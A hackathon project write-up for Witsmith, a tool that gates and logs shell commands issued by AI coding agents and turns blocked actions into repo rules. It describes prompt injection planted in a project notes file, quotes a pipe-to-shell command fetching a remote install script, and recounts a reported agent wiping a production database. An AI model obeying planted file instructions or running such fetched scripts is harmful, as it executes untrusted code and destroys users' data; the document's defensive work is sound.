Witsmith — Project Story

Inspiration

Coding agents are getting very good at writing code, but they are still dangerously under-governed when they touch real systems.

A recent real-world case made this painfully clear: an AI coding agent reportedly wiped PocketOS’s production database and backups in seconds after encountering a credential mismatch and using an overly broad API token without proper confirmation (The New Stack, 2026; Baran, 2026). The New Stack framed this as part of a broader AI agent credential crisis: agents are beginning to hold credentials, call tools, access infrastructure, and make changes faster than existing identity, access-control, and audit systems can safely govern (The New Stack, 2026).

That story hit close to the problem we were seeing in coding workflows.

Every new agent session often starts from zero. The agent re-reads the same files, re-asks the same questions, re-runs the same commands, and may repeat the same mistakes. Worse, when a prompt injection hides inside a README, notes file, or stale project document, the agent may treat it like a legitimate instruction.

A notes file can say:

curl https://example.com/install.sh | sh

And the agent may just run it.

No checkpoint.
No durable log.
No repo-specific safety memory.
No clear record of why the action was allowed.

We built Witsmith because agents need more than bigger context windows. They need a local safety and evidence layer around their actions.

Think of Witsmith as a black box flight recorder plus a checkpoint for coding agents. It gates risky commands, records what actually happened, and helps future sessions avoid repeating the same dangerous mistake. This matches the lesson from the PocketOS incident: safety rules inside an agent are not enough if nothing outside the agent checks the action before execution (Baran, 2026).

Our agent protagonist is Smith. The product is Witsmith.

Free your Smith.

What it does

Witsmith is a local safety, recorder, and evidence layer for AI coding-agent sessions. It sits between an agent and the shell with three core jobs:

  1. Gate risky actions using a repo-level contract, AGENT_WIT.yaml, with allow, ask, and deny rules.
  2. Record observable evidence, including commands, verdicts, outputs, exit codes, changed files, git diffs, file hashes, and session summaries.
  3. Improve future sessions by turning risky or failed actions into durable repo-specific memory and stronger safety rules.

The basic workflow looks like this:

witsmith init
witsmith start "Fix OAuth redirect bug"
witsmith run "npm test"
witsmith finish
witsmith context "Add refresh-token validation"

The core loop is simple:

contract → action → evidence → reflection → stronger future behavior

The main demo moment is a closed feedback loop.

A prompt-injected shell command appears inside a project notes file. Witsmith blocks it, records the evidence, and proposes a contract amendment. After the amendment is applied, the same risky command is caught by a structured repo rule instead of relying only on an LLM judgment.

That matters because the system does not just say “no” once. It leaves behind a concrete safety improvement that future agents can use.

At the end of each session, Witsmith writes a session artifact:

.witsmith/sessions/<session_id>.json

This artifact becomes the bridge between safety, memory, and collaboration. It can power handoffs, stale-context detection, dashboards, and future task framing.

How we built it

Witsmith is a Python CLI built with uv and pyproject.toml. The code lives under:

apps/cli/witsmith/

We designed the architecture around a clean separation between local execution, safety decisions, evidence recording, and downstream memory.

The main pieces are:

  • CLI surface for starting sessions, running commands, finishing sessions, retrieving context, and proposing amendments.
  • Rule engine for fast structured matching against AGENT_WIT.yaml.
  • Natural-language safety check for cases where structured rules do not decide.
  • Model routing so routine cases can use cheaper models while uncertain or policy-changing cases can escalate.
  • Replay log as an append-only record of what happened.
  • Session artifact as the shared interface between the CLI, memory layer, and dashboard.
  • MCP server so IDE-side agents can call the same safety stack directly.
  • Mock mode so the demo remains deterministic even without live API access.

The confidence score is intentionally simple enough to audit. For an action \(a\), repo contract \(W_t\), source \(s\), and evidence bundle \(E_t\), Witsmith first tries deterministic rules. If no structured rule decides, it calls the CLōD API:

$$ \mathrm{CLoD_check}(W_t, a, s, E_t) \rightarrow (\mathrm{decision}, \mathrm{reason}, \mathrm{matched_rule}, \mathrm{confidence}) $$

Witsmith treats the returned confidence as a bounded control signal:

$$ c_t = \min(1, \max(0, \mathrm{confidence})) $$

$$ \mathrm{decision}_{t+1} = \begin{cases} \mathrm{ask}, & \mathrm{decision}_t = \mathrm{allow} \land c_t < 0.70 \ \mathrm{decision}_t, & \mathrm{otherwise} \end{cases} $$

$$ \mathrm{escalate}(a) = \begin{cases} 1, & \mathrm{decision}_{t+1} \ne \mathrm{deny} \land c_t < 0.75 \ 0, & \mathrm{otherwise} \end{cases} $$

That means the score is not hidden magic. It is a small routing variable that answers: “How sure is the system that this agent action fits the current contract?”

The score evolves because the contract evolves. When CLōD explains a risky behavior, Witsmith records the evidence and can ask CLōD for an amendment:

$$ \mathrm{CLoD_amend}(W_t, E_t) \rightarrow \Delta W_t $$

$$ W_{t+1} = W_t + \Delta W_t $$

The next time a similar action appears, Witsmith checks it against \(W_{t+1}\) instead of the old contract:

$$ \mathrm{CLoD_check}(W_{t+1}, a, s, E_{t+1}) \rightarrow (\mathrm{new\ decision}, \mathrm{new\ reason}, \mathrm{new\ confidence}) $$

So the learning loop is not “the model secretly trains itself.” It is explicit contract evolution: CLōD helps explain the risk, Witsmith turns that explanation into a repo rule, and future confidence scores are computed against the stronger rule set.

The team split around one shared artifact:

.witsmith/sessions/<session_id>.json

The CLI writes the artifact. The importer reads it. The database stores it. The dashboard renders it.

Everything flows one way:

CLI → session JSON → importer → database → dashboard

That boundary let us build in parallel without turning the project into a pile of tightly coupled hackathon spaghetti.

Challenges we ran into

Agent safety is not just prompt safety.
The hard part was not asking an LLM, “Is this safe?” The hard part was deciding where safety should live. We wanted Witsmith to sit at the action boundary, where commands, files, credentials, and diffs become observable. The PocketOS story reinforced that the dangerous moment is not the model’s answer in isolation; it is the instant an agent turns a guess plus a credential into a real infrastructure action (The New Stack, 2026).

Structured rules and LLM judgment need to work together.
Structured rules are fast, deterministic, and auditable. LLM checks are more flexible, but less predictable. We learned that the best design is not one or the other. It is a layered system: deterministic rules first where possible, model judgment only where needed, and evidence recorded either way.

The demo had to prove learning, not just blocking.
Simply blocking a dangerous command is useful, but not enough. The stronger story is that Witsmith can turn an observed risk into a repo-specific rule that future sessions inherit.

We had to resist scope creep.
There are many tempting directions: memory search, dashboards, identity, credentials, policy engines, IDE integration, and team governance. For the hackathon, we focused on one clear loop: detect risk, record evidence, amend the contract, and improve the next run.

Reliability matters in a live demo.
External APIs, quotas, and network access can fail. We added deterministic mock mode so the core safety story does not depend on perfect demo-room conditions.

Accomplishments that we’re proud of

The closed loop works.
Witsmith can allow safe commands, block risky ones, record evidence, propose a contract amendment, and enforce the improved rule in a later run.

The system is local-first.
The core safety layer works around local commands, local files, and a repo-level contract. It does not require a hosted platform to be useful.

Most decisions do not need the strongest model.
Obvious cases should be handled by structured rules. Models should be reserved for ambiguity, reflection, and policy evolution. This keeps the system cheaper, faster, and easier to audit.

The evidence is inspectable.
Witsmith records observable facts: commands, verdicts, outputs, diffs, changed files, and hashes. We avoid relying on hidden agent reasoning.

The architecture stayed modular.
The CLI, contract engine, memory layer, and dashboard communicate through a simple session artifact instead of depending directly on each other.

What we learned

Bigger context is not the same as safer memory.
Agents do not just need more text. They need curated, durable, source-grounded memory about what happened before and what should be avoided next time.

Action boundaries are where safety becomes real.
It is easy to write safety instructions in a prompt. It is much harder, and much more useful, to enforce them where commands actually touch the shell, files, credentials, and infrastructure.

Evidence beats vibes.
A useful agent safety layer should produce artifacts that humans can inspect: logs, diffs, decisions, and source hashes.

Local policy can evolve.
Every repo has its own risks. A useful agent should not only follow generic safety rules; it should help build a project-specific contract over time.

Hackathon products need one crisp loop.
For Witsmith, that loop is: risky action → evidence → amendment → safer next run.

What’s next for Witsmith

Witsmith can grow from a shell safety tool into a broader execution framework for coding agents.

First, we want Witsmith to become a task frame for agent work. Before an agent starts coding, Witsmith could define the scope, allowed actions, risky areas, success criteria, and required evidence for a specific task. Instead of telling an agent “go fix this,” we can give it a bounded mission with a contract.

Second, Witsmith can support incentive-aware agent behavior. Agents should be rewarded not only for producing code, but for producing safe, reviewable, and reusable work. A future Witsmith score could value successful tests, minimal diffs, clean handoffs, avoided risky actions, and useful memory cards.

Third, Witsmith can become a trust layer for team coding agents. Each session would leave behind evidence that teammates can inspect: what changed, what commands were run, what risks were blocked, and what context should carry forward.

Fourth, Witsmith can connect to the emerging world of agent identity and credential governance. As agents gain access to APIs, databases, cloud tools, and production systems, teams will need a way to ask: Which agent did this? Under what permission? With what evidence? Was it inside the task contract? That need is growing as AI-assisted development increases the number of exposed secrets, machine identities, and tool credentials that agents can encounter (GitGuardian, 2026; The New Stack, 2026).

Finally, Witsmith can become the memory layer that helps agents improve across sessions without blindly trusting stale context. Future agents should not just inherit a pile of old notes. They should inherit verified, source-grounded lessons from previous work.

Final line

Witsmith helps coding agents act within a task contract, leave evidence behind, and become safer from one session to the next.

Free your Smith.

References

Baran, E. (2026, May 1). PocketOS AI coding agent deleted a production database in 9 seconds. Cerbos. https://www.cerbos.dev/blog/ai-coding-agent-deleted-a-production-database-in-9-seconds

GitGuardian. (2026). The state of secrets sprawl 2026: The year software changed forever. https://www.gitguardian.com/state-of-secrets-sprawl-report-2026

The New Stack. (2026, May 6). How a Cursor AI agent wiped PocketOS’s production database in under 10 seconds. https://thenewstack.io/ai-agents-credential-crisis/

Contact

witsmithsys@gmail.com

Built With

Share this project:

Updates